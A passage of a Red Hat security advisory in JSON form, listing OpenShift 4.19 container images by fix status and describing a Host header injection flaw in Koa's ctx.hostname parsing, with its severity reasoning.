"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442928"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Koa\u2019s ctx.hostname API used in Node.js applications. The function incorrectly parses specially crafted HTTP Host headers containing an @ character, which can cause the extracted hostname value to differ from the intended origin. An attacker can exploit this behavior by sending a malicious Host header to influence the hostname value returned by ctx.hostname. Applications that rely on this value for generating absolute URLs, password reset links, or email verification links without additional validation may be susceptible to Host header injection attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "koa: Koa: Host header injection vulnerability due to malformed HTTP Host header parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security considers this issue as High severity. \n\nA remote, unauthenticated attacker can send a specially crafted HTTP Host header containing a valid RFC 3986 userinfo component (using the @ delimiter). Due to improper parsing of the authority field in the ctx.hostname API, the application may treat attacker-controlled input as the hostname value. Exploitation occurs when the server processes the malicious request and does not require user interaction (UI:N).\n\nApplications that rely on ctx.hostname to construct absolute URLs, such as: password reset links, email verification links, OAuth redirect URIs, or webhook endpoints, may generate security sensitive URLs that reference an attacker controlled domain. This can result in integrity violations, including manipulation of authentication flows or account takeover scenarios. Integrity impact is therefore rated High.\n\nConfidentiality impact is considered Low because disclosure of sensitive data depends on application-specific usage patterns. The vulnerability does not automatically expose information from the server. However, if an affected application uses the manipulated hostname value to generate security-sensitive links such as password reset or email verification URLs and embeds tokens in those links without additional validation, a victim who later follows such a link may inadvertently disclose those tokens to an attacker controlled domain. Such disclosure is conditional, application-dependent like how the application constructs URLs. Also, the subsequent user interaction beyond the initial exploitation, the confidentiality impact is assessed as Low (C:L).",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
